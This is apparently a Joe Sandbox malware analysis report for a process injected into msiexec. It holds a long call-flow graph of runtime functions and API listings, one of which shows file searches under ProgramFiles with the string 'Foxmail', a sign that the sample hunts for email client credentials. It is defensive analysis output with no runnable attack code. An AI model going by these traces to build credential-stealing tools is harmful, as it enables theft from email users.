6512->6513 6514 21bd92a5 6513->6514 6515 21bd571e _free 20 API calls 6514->6515 6516 21bd92b0 6515->6516 6517 21bd571e _free 20 API calls 6516->6517 6518 21bd92bb 6517->6518 6519 21bd571e _free 20 API calls 6518->6519 6520 21bd92c6 6519->6520 6521 21bd9221 __fassign 20 API calls 6520->6521 6522 21bd92d4 6521->6522 6523 21bd9221 __fassign 20 API calls 6522->6523 6524 21bd92e2 6523->6524 6525 21bd9221 __fassign 20 API calls 6524->6525 6526 21bd92f3 6525->6526 6527 21bd9221 __fassign 20 API calls 6526->6527 6528 21bd9301 6527->6528 6529 21bd9221 __fassign 20 API calls 6528->6529 6530 21bd930f 6529->6530 6531 21bd571e _free 20 API calls 6530->6531 6532 21bd931a 6531->6532 6533 21bd571e _free 20 API calls 6532->6533 6534 21bd9325 6533->6534 6535 21bd571e _free 20 API calls 6534->6535 6536 21bd9330 6535->6536 6537 21bd571e _free 20 API calls 6536->6537 6537->6503 6538->6427 6540 21bd6b05 6539->6540 6548 21bd6baf 6539->6548 6549 21bd86e4 6540->6549 6543 21bd2ada _ValidateLocalCookies 5 API calls 6545 21bd6c5b 6543->6545 6545->6381 6547 21bd8a3e 43 API calls 6547->6548 6548->6543 6550 21bd54a7 __fassign 38 API calls 6549->6550 6551 21bd8704 MultiByteToWideChar 6550->6551 6553 21bd8742 6551->6553 6561 21bd87da 6551->6561 6555 21bd56d0 21 API calls 6553->6555 6559 21bd8763 ___scrt_fastfail 6553->6559 6554 21bd2ada _ValidateLocalCookies 5 API calls 6556 21bd6b66 6554->6556 6555->6559 6563 21bd8a3e 6556->6563 6557 21bd87d4 6568 21bd8801 6557->6568 6559->6557 6560 21bd87a8 MultiByteToWideChar 6559->6560 6560->6557 6562 21bd87c4 GetStringTypeW 6560->6562 6561->6554 6562->6557 6564 21bd54a7 __fassign 38 API calls 6563->6564 6565 21bd8a51 6564->6565 6572 21bd8821 6565->6572 6569 21bd881e 6568->6569 6570 21bd880d 6568->6570 6569->6561 6570->6569 6571 21bd571e _free 20 API calls 6570->6571 6571->6569 6573 21bd883c 6572->6573 6574 21bd8862 MultiByteToWideChar 6573->6574 6575 21bd888c 6574->6575 6576 21bd8a16 6574->6576 6580 21bd56d0 21 API calls 6575->6580 6581 21bd88ad 6575->6581 6577 21bd2ada _ValidateLocalCookies 5 API calls 6576->6577 6578 21bd6b87 6577->6578 6578->6547 6579 21bd88f6 MultiByteToWideChar 6582 21bd890f 6579->6582 6594 21bd8962 6579->6594 6580->6581 6581->6579 6581->6594 6599 21bd5f19 6582->6599 6584 21bd8801 __freea 20 API calls 6584->6576 6586 21bd8939 6591 21bd5f19 11 API calls 6586->6591 6586->6594 6587 21bd8971 6588 21bd8992 6587->6588 6589 21bd56d0 21 API calls 6587->6589 6590 21bd8a07 6588->6590 6593 21bd5f19 11 API calls 6588->6593 6589->6588 6592 21bd8801 __freea 20 API calls 6590->6592 6591->6594 6592->6594 6595 21bd89e6 6593->6595 6594->6584 6595->6590 6596 21bd89f5 WideCharToMultiByte 6595->6596 6596->6590 6597 21bd8a35 6596->6597 6598 21bd8801 __freea 20 API calls 6597->6598 6598->6594 6600 21bd5c45 _abort 5 API calls 6599->6600 6601 21bd5f40 6600->6601 6604 21bd5f49 6601->6604 6607 21bd5fa1 6601->6607 6605 21bd2ada _ValidateLocalCookies 5 API calls 6604->6605 6606 21bd5f9b 6605->6606 6606->6586 6606->6587 6606->6594 6608 21bd5c45 _abort 5 API calls 6607->6608 6609 21bd5fc8 6608->6609 6610 21bd2ada _ValidateLocalCookies 5 API calls 6609->6610 6611 21bd5f89 LCMapStringW 6610->6611 6611->6604 6613 21bd6892 ___DestructExceptionObject 6612->6613 6620 21bd5671 RtlEnterCriticalSection 6613->6620 6615 21bd689c 6621 21bd68f1 6615->6621 6619 21bd68b5 _abort 6619->6386 6620->6615 6633 21bd7011 6621->6633 6623 21bd693f 6624 21bd7011 26 API calls 6623->6624 6625 21bd695b 6624->6625 6626 21bd7011 26 API calls 6625->6626 6627 21bd6979 6626->6627 6628 21bd68a9 6627->6628 6629 21bd571e _free 20 API calls 6627->6629 6630 21bd68bd 6628->6630 6629->6628 6647 21bd56b9 RtlLeaveCriticalSection 6630->6647 6632 21bd68c7 6632->6619 6634 21bd7022 6633->6634 6643 21bd701e 6633->6643 6635 21bd703c ___scrt_fastfail 6634->6635 6636 21bd7029 6634->6636 6640 21bd706a 6635->6640 6641 21bd7073 6635->6641 6635->6643 6637 21bd6368 _free 20 API calls 6636->6637 6638 21bd702e 6637->6638 6639 21bd62ac _abort 26 API calls 6638->6639 6639->6643 6642 21bd6368 _free 20 API calls 6640->6642 6641->6643 6644 21bd6368 _free 20 API calls 6641->6644 6645 21bd706f 6642->6645 6643->6623 6644->6645 6646 21bd62ac _abort 26 API calls 6645->6646 6646->6643 6647->6632 7404 21bd2049 7405 21bd2055 ___DestructExceptionObject 7404->7405 7406 21bd205e 7405->7406 7407 21bd207d 7405->7407 7408 21bd20d3 7405->7408 7418 21bd244c 7407->7418 7410 21bd2639 ___scrt_fastfail 4 API calls 7408->7410 7412 21bd20da 7410->7412 7411 21bd2082 7427 21bd2308 7411->7427 7414 21bd2087 __RTC_Initialize 7430 21bd20c4 7414->7430 7416 21bd209f 7433 21bd260b 7416->7433 7419 21bd2451 ___scrt_release_startup_lock 7418->7419 7420 21bd2455 7419->7420 7424 21bd2461 7419->7424 7421 21bd527a _abort 20 API calls 7420->7421 7422 21bd245f 7421->7422 7422->7411 7423 21bd246e 7423->7411 7424->7423 7425 21bd499b _abort 28 API calls 7424->7425 7426 21bd4bbd 7425->7426 7426->7411 7439 21bd34c7 RtlInterlockedFlushSList 7427->7439 7429 21bd2312 7429->7414 7441 21bd246f 7430->7441 7432 21bd20c9 ___scrt_release_startup_lock 7432->7416 7434 21bd2617 7433->7434 7438 21bd262d 7434->7438 7449 21bd53ed 7434->7449 7437 21bd3529 ___vcrt_uninitialize 8 API calls 7437->7438 7438->7406 7440 21bd34d7 7439->7440 7440->7429 7446 21bd53ff 7441->7446 7444 21bd391b ___vcrt_uninitialize_ptd 6 API calls 7445 21bd354d 7444->7445 7445->7432 7447 21bd5c2b 11 API calls 7446->7447 7448 21bd2476 7447->7448 7448->7444 7452 21bd74da 7449->7452 7453 21bd74f3 7452->7453 7454 21bd2ada _ValidateLocalCookies 5 API calls 7453->7454 7455 21bd2625 7454->7455 7455->7437 7456 21bd5348 7457 21bd3529 ___vcrt_uninitialize 8 API calls 7456->7457 7458 21bd534f 7457->7458 7459 21bd7b48 7469 21bd8ebf 7459->7469 7463 21bd7b55 7482 21bd907c 7463->7482 7466 21bd7b7f 7467 21bd571e _free 20 API calls 7466->7467 7468 21bd7b8a 7467->7468 7486 21bd8ec8 7469->7486 7471 21bd7b50 7472 21bd8fdc 7471->7472 7473 21bd8fe8 ___DestructExceptionObject 7472->7473 7506 21bd5671 RtlEnterCriticalSection 7473->7506 7475 21bd905e 7520 21bd9073 7475->7520 7477 21bd9032 RtlDeleteCriticalSection 7480 21bd571e _free 20 API calls 7477->7480 7478 21bd906a _abort 7478->7463 7481 21bd8ff3 7480->7481 7481->7475 7481->7477 7507 21bda09c 7481->7507 7483 21bd7b64 RtlDeleteCriticalSection 7482->7483 7484 21bd9092 7482->7484 7483->7463 7483->7466 7484->7483 7485 21bd571e _free 20 API calls 7484->7485 7485->7483 7487 21bd8ed4 ___DestructExceptionObject 7486->7487 7496 21bd5671 RtlEnterCriticalSection 7487->7496 7489 21bd8f77 7501 21bd8f97 7489->7501 7492 21bd8f83 _abort 7492->7471 7494 21bd8e78 66 API calls 7495 21bd8ee3 7494->7495 7495->7489 7495->7494 7497 21bd7b94 RtlEnterCriticalSection 7495->7497 7498 21bd8f6d 7495->7498 7496->7495 7497->7495 7504 21bd7ba8 RtlLeaveCriticalSection 7498->7504 7500 21bd8f75 7500->7495 7505 21bd56b9 RtlLeaveCriticalSection 7501->7505 7503 21bd8f9e 7503->7492 7504->7500 7505->7503 7506->7481 7508 21bda0a8 ___DestructExceptionObject 7507->7508 7509 21bda0ce 7508->7509 7510 21bda0b9 7508->7510 7519 21bda0c9 _abort 7509->7519 7523 21bd7b94 RtlEnterCriticalSection 7509->7523 7511 21bd6368 _free 20 API calls 7510->7511 7512 21bda0be 7511->7512 7514 21bd62ac _abort 26 API calls 7512->7514 7514->7519 7515 21bda0ea 7524 21bda026 7515->7524 7517 21bda0f5 7540 21bda112 7517->7540 7519->7481 7788 21bd56b9 RtlLeaveCriticalSection 7520->7788 7522 21bd907a 7522->7478 7523->7515 7525 21bda048 7524->7525 7526 21bda033 7524->7526 7538 21bda043 7525->7538 7543 21bd8e12 7525->7543 7527 21bd6368 _free 20 API calls 7526->7527 7528 21bda038 7527->7528 7531 21bd62ac _abort 26 API calls 7528->7531 7531->7538 7532 21bd907c 20 API calls 7533 21bda064 7532->7533 7549 21bd7a5a 7533->7549 7535 21bda06a 7556 21bdadce 7535->7556 7538->7517 7539 21bd571e _free 20 API calls 7539->7538 7787 21bd7ba8 RtlLeaveCriticalSection 7540->7787 7542 21bda11a 7542->7519 7544 21bd8e2a 7543->7544 7545 21bd8e26 7543->7545 7544->7545 7546 21bd7a5a 26 API calls 7544->7546 7545->7532 7547 21bd8e4a 7546->7547 7571 21bd9a22 7547->7571 7550 21bd7a7b 7549->7550 7551 21bd7a66 7549->7551 7550->7535 7552 21bd6368 _free 20 API calls 7551->7552 7553 21bd7a6b 7552->7553 7554 21bd62ac _abort 26 API calls 7553->7554 7555 21bd7a76 7554->7555 7555->7535 7557 21bdaddd 7556->7557 7561 21bdadf2 7556->7561 7558 21bd6355 __dosmaperr 20 API calls 7557->7558 7560 21bdade2 7558->7560 7559 21bdae2d 7562 21bd6355 __dosmaperr 20 API calls 7559->7562 7563 21bd6368 _free 20 API calls 7560->7563 7561->7559 7564 21bdae19 7561->7564 7565 21bdae32 7562->7565 7568 21bda070 7563->7568 7744 21bdada6 7564->7744 7567 21bd6368 _free 20 API calls 7565->7567 7569 21bdae3a 7567->7569 7568->7538 7568->7539 7570 21bd62ac _abort 26 API calls 7569->7570 7570->7568 7572 21bd9a2e ___DestructExceptionObject 7571->7572 7573 21bd9a4e 7572->7573 7574 21bd9a36 7572->7574 7576 21bd9aec 7573->7576 7580 21bd9a83 7573->7580 7596 21bd6355 7574->7596 7578 21bd6355 __dosmaperr 20 API calls 7576->7578 7579 21bd9af1 7578->7579 7582 21bd6368 _free 20 API calls 7579->7582 7599 21bd8c7b RtlEnterCriticalSection 7580->7599 7581 21bd6368 _free 20 API calls 7584 21bd9a43 _abort 7581->7584 7585 21bd9af9 7582->7585 7584->7545 7587 21bd62ac _abort 26 API calls 7585->7587 7586 21bd9a89 7588 21bd9aba 7586->7588 7589 21bd9aa5 7586->7589 7587->7584 7600 21bd9b0d 7588->7600 7590 21bd6368 _free 20 API calls 7589->7590 7592 21bd9aaa 7590->7592 7594 21bd6355 __dosmaperr 20 API calls 7592->7594 7593 21bd9ab5 7651 21bd9ae4 7593->7651 7594->7593 7597 21bd5b7a _abort 20 API calls 7596->7597 7598 21bd635a 7597->7598 7598->7581 7599->7586 7601 21bd9b3b 7600->7601 7646 21bd9b34 7600->7646 7602 21bd9b3f 7601->7602 7603 21bd9b5e 7601->7603 7604 21bd6355 __dosmaperr 20 API calls 7602->7604 7607 21bd9baf 7603->7607 7608 21bd9b92 7603->7608 7606 21bd9b44 7604->7606 7605 21bd2ada _ValidateLocalCookies 5 API calls 7609 21bd9d15 7605->7609 7610 21bd6368 _free 20 API calls 7606->7610 7611 21bd9bc5 7607->7611 7654 21bda00b 7607->7654 7612 21bd6355 __dosmaperr 20 API calls 7608->7612 7609->7593 7613 21bd9b4b 7610->7613 7657 21bd96b2 7611->7657 7616 21bd9b97 7612->7616 7618 21bd62ac _abort 26 API calls 7613->7618 7617 21bd6368 _free 20 API calls 7616->7617 7620 21bd9b9f 7617->7620 7618->7646 7623 21bd62ac _abort 26 API calls 7620->7623 7621 21bd9c0c 7624 21bd9c66 WriteFile 7621->7624 7625 21bd9c20 7621->7625 7622 21bd9bd3 7626 21bd9bf9 7622->7626 7627 21bd9bd7 7622->7627 7623->7646 7628 21bd9c89 GetLastError 7624->7628 7636 21bd9bef 7624->7636 7630 21bd9c28 7625->7630 7631 21bd9c56 7625->7631 7669 21bd9492 GetConsoleCP 7626->7669 7640 21bd9ccd 7627->7640 7664 21bd9645 7627->7664 7628->7636 7633 21bd9c46 7630->7633 7637 21bd9c2d 7630->7637 7695 21bd9728 7631->7695 7687 21bd98f5 7633->7687 7635 21bd6368 _free 20 API calls 7639 21bd9cf2 7635->7639 7636->7640 7641 21bd9ca9 7636->7641 7636->7646 7637->7640 7680 21bd9807 7637->7680 7643 21bd6355 __dosmaperr 20 API calls 7639->7643 7640->7635 7640->7646 7644 21bd9cc4 7641->7644 7645 21bd9cb0 7641->7645 7643->7646 7702 21bd6332 7644->7702 7647 21bd6368 _free 20 API calls 7645->7647 7646->7605 7649 21bd9cb5 7647->7649 7650 21bd6355 __dosmaperr 20 API calls 7649->7650 7650->7646 7743 21bd8c9e RtlLeaveCriticalSection 7651->7743 7653 21bd9aea 7653->7584 7707 21bd9f8d 7654->7707 7729 21bd8dbc 7657->7729 7659 21bd96c2 7660 21bd96c7 7659->7660 7661 21bd5af6 _abort 38 API calls 7659->7661 7660->7621 7660->7622 7662 21bd96ea 7661->7662 7662->7660 7663 21bd9708 GetConsoleMode 7662->7663 7663->7660 7666 21bd966a 7664->7666 7668 21bd969f 7664->7668 7665 21bd96a1 GetLastError 7665->7668 7666->7665 7667 21bda181 WriteConsoleW CreateFileW 7666->7667 7666->7668 7667->7666 7668->7636 7673 21bd94f5 7669->7673 7679 21bd9607 7669->7679 7670 21bd2ada _ValidateLocalCookies 5 API calls 7672 21bd9641 7670->7672 7672->7636 7674 21bd957b WideCharToMultiByte 7673->7674 7676 21bd79e6 40 API calls __fassign 7673->7676 7678 21bd95d2 WriteFile 7673->7678 7673->7679 7738 21bd7c19 7673->7738 7675 21bd95a1 WriteFile 7674->7675 7674->7679 7675->7673 7677 21bd962a GetLastError 7675->7677 7676->7673 7677->7679 7678->7673 7678->7677 7679->7670 7681 21bd9816 7680->7681 7682 21bd98d8 7681->7682 7683 21bd9894 WriteFile 7681->7683 7684 21bd2ada _ValidateLocalCookies 5 API calls 7682->7684 7683->7681 7685 21bd98da GetLastError 7683->7685 7686 21bd98f1 7684->7686 7685->7682 7686->7636 7694 21bd9904 7687->7694 7688 21bd9a0f 7689 21bd2ada _ValidateLocalCookies 5 API calls 7688->7689 7690 21bd9a1e 7689->7690 7690->7636 7691 21bd9986 WideCharToMultiByte 7692 21bd99bb WriteFile 7691->7692 7693 21bd9a07 GetLastError 7691->7693 7692->7693 7692->7694 7693->7688 7694->7688 7694->7691 7694->7692 7700 21bd9737 7695->7700 7696 21bd97ea 7697 21bd2ada _ValidateLocalCookies 5 API calls 7696->7697 7699 21bd9803 7697->7699 7698 21bd97a9 WriteFile 7698->7700 7701 21bd97ec GetLastError 7698->7701 7699->7636 7700->7696 7700->7698 7701->7696 7703 21bd6355 __dosmaperr 20 API calls 7702->7703 7704 21bd633d _free 7703->7704 7705 21bd6368 _free 20 API calls 7704->7705 7706 21bd6350 7705->7706 7706->7646 7716 21bd8d52 7707->7716 7709 21bd9f9f 7710 21bd9fb8 SetFilePointerEx 7709->7710 7711 21bd9fa7 7709->7711 7713 21bd9fd0 GetLastError 7710->7713 7715 21bd9fac 7710->7715 7712 21bd6368 _free 20 API calls 7711->7712 7712->7715 7714 21bd6332 __dosmaperr 20 API calls 7713->7714 7714->7715 7715->7611 7717 21bd8d5f 7716->7717 7718 21bd8d74 7716->7718 7719 21bd6355 __dosmaperr 20 API calls 7717->7719 7720 21bd6355 __dosmaperr 20 API calls 7718->7720 7722 21bd8d99 7718->7722 7721 21bd8d64 7719->7721 7723 21bd8da4 7720->7723 7724 21bd6368 _free 20 API calls 7721->7724 7722->7709 7725 21bd6368 _free 20 API calls 7723->7725 7726 21bd8d6c 7724->7726 7727 21bd8dac 7725->7727 7726->7709 7728 21bd62ac _abort 26 API calls 7727->7728 7728->7726 7730 21bd8dc9 7729->7730 7731 21bd8dd6 7729->7731 7732 21bd6368 _free 20 API calls 7730->7732 7734 21bd8de2 7731->7734 7735 21bd6368 _free 20 API calls 7731->7735 7733 21bd8dce 7732->7733 7733->7659 7734->7659 7736 21bd8e03 7735->7736 7737 21bd62ac _abort 26 API calls 7736->7737 7737->7733 7739 21bd5af6 _abort 38 API calls 7738->7739 7740 21bd7c24 7739->7740 7741 21bd7a00 __fassign 38 API calls 7740->7741 7742 21bd7c34 7741->7742 7742->7673 7743->7653 7747 21bdad24 7744->7747 7746 21bdadca 7746->7568 7748 21bdad30 ___DestructExceptionObject 7747->7748 7758 21bd8c7b RtlEnterCriticalSection 7748->7758 7750 21bdad3e 7751 21bdad65 7750->7751 7752 21bdad70 7750->7752 7759 21bdae4d 7751->7759 7753 21bd6368 _free 20 API calls 7752->7753 7755 21bdad6b 7753->7755 7774 21bdad9a 7755->7774 7757 21bdad8d _abort 7757->7746 7758->7750 7760 21bd8d52 26 API calls 7759->7760 7763 21bdae5d 7760->7763 7761 21bdae63 7777 21bd8cc1 7761->7777 7763->7761 7765 21bd8d52 26 API calls 7763->7765 7773 21bdae95 7763->7773 7764 21bd8d52 26 API calls 7766 21bdaea1 CloseHandle 7764->7766 7769 21bdae8c 7765->7769 7766->7761 7770 21bdaead GetLastError 7766->7770 7768 21bdaedd 7768->7755 7772 21bd8d52 26 API calls 7769->7772 7770->7761 7771 21bd6332 __dosmaperr 20 API calls 7771->7768 7772->7773 7773->7761 7773->7764 7786 21bd8c9e RtlLeaveCriticalSection 7774->7786 7776 21bdada4 7776->7757 7778 21bd8d37 7777->7778 7779 21bd8cd0 7777->7779 7780 21bd6368 _free 20 API calls 7778->7780 7779->7778 7785 21bd8cfa 7779->7785 7781 21bd8d3c 7780->7781 7782 21bd6355 __dosmaperr 20 API calls 7781->7782 7783 21bd8d27 7782->7783 7783->7768 7783->7771 7784 21bd8d21 SetStdHandle 7784->7783 7785->7783 7785->7784 7786->7776 7787->7542 7788->7522 6648 21bd508a 6649 21bd509c 6648->6649 6650 21bd50a2 6648->6650 6652 21bd5000 6649->6652 6653 21bd500d 6652->6653 6654 21bd502a 6652->6654 6655 21bd5024 6653->6655 6657 21bd571e _free 20 API calls 6653->6657 6654->6650 6656 21bd571e _free 20 API calls 6655->6656 6656->6654 6657->6653 7789 21bda945 7793 21bda96d 7789->7793 7790 21bda9a5 7791 21bda99e 7798 21bdaa00 7791->7798 7792 21bda997 7794 21bdaa17 21 API calls 7792->7794 7793->7790 7793->7791 7793->7792 7796 21bda99c 7794->7796 7799 21bdaa20 7798->7799 7800 21bdb19b __startOneArgErrorHandling 21 API calls 7799->7800 7801 21bda9a3 7800->7801 7078 21bd7bc7 7079 21bd7bd3 ___DestructExceptionObject 7078->7079 7082 21bd7c0a _abort 7079->7082 7086 21bd5671 RtlEnterCriticalSection 7079->7086 7081 21bd7be7 7083 21bd7f86 __fassign 20 API calls 7081->7083 7084 21bd7bf7 7083->7084 7087 21bd7c10 7084->7087 7086->7081 7090 21bd56b9 RtlLeaveCriticalSection 7087->7090 7089 21bd7c17 7089->7082 7090->7089 7091 21bda1c6 IsProcessorFeaturePresent 6658 21bd7a80 6659 21bd7a8d 6658->6659 6660 21bd637b _abort 20 API calls 6659->6660 6661 21bd7aa7 6660->6661 6662 21bd571e _free 20 API calls 6661->6662 6663 21bd7ab3 6662->6663 6664 21bd637b _abort 20 API calls 6663->6664 6668 21bd7ad9 6663->6668 6666 21bd7acd 6664->6666 6667 21bd571e _free 20 API calls 6666->6667 6667->6668 6669 21bd7ae5 6668->6669 6670 21bd5eb7 6668->6670 6671 21bd5c45 _abort 5 API calls 6670->6671 6672 21bd5ede 6671->6672 6673 21bd5efc InitializeCriticalSectionAndSpinCount 6672->6673 6674 21bd5ee7 6672->6674 6673->6674 6675 21bd2ada _ValidateLocalCookies 5 API calls 6674->6675 6676 21bd5f13 6675->6676 6676->6668 7802 21bd8640 7805 21bd8657 7802->7805 7806 21bd8679 7805->7806 7807 21bd8665 7805->7807 7809 21bd8681 7806->7809 7810 21bd8693 7806->7810 7808 21bd6368 _free 20 API calls 7807->7808 7811 21bd866a 7808->7811 7812 21bd6368 _free 20 API calls 7809->7812 7813 21bd54a7 __fassign 38 API calls 7810->7813 7816 21bd8652 7810->7816 7814 21bd62ac _abort 26 API calls 7811->7814 7815 21bd8686 7812->7815 7813->7816 7814->7816 7817 21bd62ac _abort 26 API calls 7815->7817 7817->7816 7269 21bd7103 GetCommandLineA GetCommandLineW 7270 21bd5303 7273 21bd50a5 7270->7273 7282 21bd502f 7273->7282 7276 21bd502f 5 API calls 7277 21bd50c3 7276->7277 7278 21bd5000 20 API calls 7277->7278 7279 21bd50ce 7278->7279 7280 21bd5000 20 API calls 7279->7280 7281 21bd50d9 7280->7281 7283 21bd5048 7282->7283 7284 21bd2ada _ValidateLocalCookies 5 API calls 7283->7284 7285 21bd5069 7284->7285 7285->7276 7818 21bdaf43 7819 21bdaf4d 7818->7819 7820 21bdaf59 7818->7820 7819->7820 7821 21bdaf52 CloseHandle 7819->7821 7821->7820

                                                                                                    Executed Functions

                                                                                                    Function 21BD10F1 Relevance: 12.1, APIs: 8, Instructions: 88stringfileCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 21BD1137
                                                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 21BD1151
                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 21BD115C
                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 21BD116D
                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 21BD117C
                                                                                                    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 21BD1193
                                                                                                    • FindNextFileW.KERNELBASE(00000000,00000010), ref: 21BD11D0
                                                                                                    • FindClose.KERNEL32(00000000), ref: 21BD11DB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                    • String ID:
                                                                                                    • API String ID: 1083526818-0
                                                                                                    • Opcode ID: 34802c38cf07b8d8df4de3bac5bde5d0158c56b6d0073d13bd313e40a7efd439
                                                                                                    • Instruction ID: 15937c7fe72834f2101b4151d55ec36274c4c563a48cc193c8c45657e12d988f
                                                                                                    • Opcode Fuzzy Hash: 34802c38cf07b8d8df4de3bac5bde5d0158c56b6d0073d13bd313e40a7efd439
                                                                                                    • Instruction Fuzzy Hash: 6721E3729443496BDB18EAA4DC48F9B7BACEF89314F000D2AFA98D30D0E734D6058796
                                                                                                    Function 21BD12EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243stringCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 21BD1434
                                                                                                      • Part of subcall function 21BD10F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 21BD1137
                                                                                                      • Part of subcall function 21BD10F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 21BD1151
                                                                                                      • Part of subcall function 21BD10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 21BD115C
                                                                                                      • Part of subcall function 21BD10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 21BD116D
                                                                                                      • Part of subcall function 21BD10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 21BD117C
                                                                                                      • Part of subcall function 21BD10F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 21BD1193
                                                                                                      • Part of subcall function 21BD10F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 21BD11D0
                                                                                                      • Part of subcall function 21BD10F1: FindClose.KERNEL32(00000000), ref: 21BD11DB
                                                                                                    • lstrlenW.KERNEL32(?), ref: 21BD14C5
                                                                                                    • lstrlenW.KERNEL32(?), ref: 21BD14E0
                                                                                                    • lstrlenW.KERNEL32(?,?), ref: 21BD150F
                                                                                                    • lstrcatW.KERNEL32(00000000), ref: 21BD1521
                                                                                                    • lstrlenW.KERNEL32(?,?), ref: 21BD1547
                                                                                                    • lstrcatW.KERNEL32(00000000), ref: 21BD1553
                                                                                                    • lstrlenW.KERNEL32(?,?), ref: 21BD1579
                                                                                                    • lstrcatW.KERNEL32(00000000), ref: 21BD1585
                                                                                                    • lstrlenW.KERNEL32(?,?), ref: 21BD15AB
                                                                                                    • lstrcatW.KERNEL32(00000000), ref: 21BD15B7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                    • String ID: )$Foxmail$ProgramFiles
                                                                                                    • API String ID: 672098462-2938083778
                                                                                                    • Opcode ID: 460794e71e872a7b87083a45fecd11cc653fe9e322abdcf4edfc04deda624c4a
                                                                                                    • Instruction ID: 95aa7f437a434e503b6c9e3b2735645973f7eb294f2b777900bd636055e40a45
                                                                                                    • Opcode Fuzzy Hash: 460794e71e872a7b87083a45fecd11cc653fe9e322abdcf4edfc04deda624c4a
                                                                                                    • Instruction Fuzzy Hash: A081B272A40359A9DF28DBA1DC85FEF737DEF88700F100596F508E7190EA715A84CB95

                                                                                                    Non-executed Functions

                                                                                                    Function 21BD60E2 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 21BD61DA
                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 21BD61E4
                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 21BD61F1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                    • String ID:
                                                                                                    • API String ID: 3906539128-0
                                                                                                    • Opcode ID: eea2305f6f139ef7119eb8e714563213b1d74ecd8f97e6754e483cb13bbe9586
                                                                                                    • Instruction ID: d49c84796d570ddefddc478421ce519e787615d4e5855ea0e9ab4e0ac9dc51d0
                                                                                                    • Opcode Fuzzy Hash: eea2305f6f139ef7119eb8e714563213b1d74ecd8f97e6754e483cb13bbe9586
                                                                                                    • Instruction Fuzzy Hash: C431D375D4121D9BCB29DF64D98878DBBB8EF08310F5041EAE81CA7260E7349F818F45
                                                                                                    Function 21BD4AB4 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(?,?,21BD4A8A,?,21BE2238,0000000C,21BD4BBD,00000000,00000000,00000001,21BD2082,21BE2108,0000000C,21BD1F3A,?), ref: 21BD4AD5
                                                                                                    • TerminateProcess.KERNEL32(00000000,?,21BD4A8A,?,21BE2238,0000000C,21BD4BBD,00000000,00000000,00000001,21BD2082,21BE2108,0000000C,21BD1F3A,?), ref: 21BD4ADC
                                                                                                    • ExitProcess.KERNEL32 ref: 21BD4AEE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
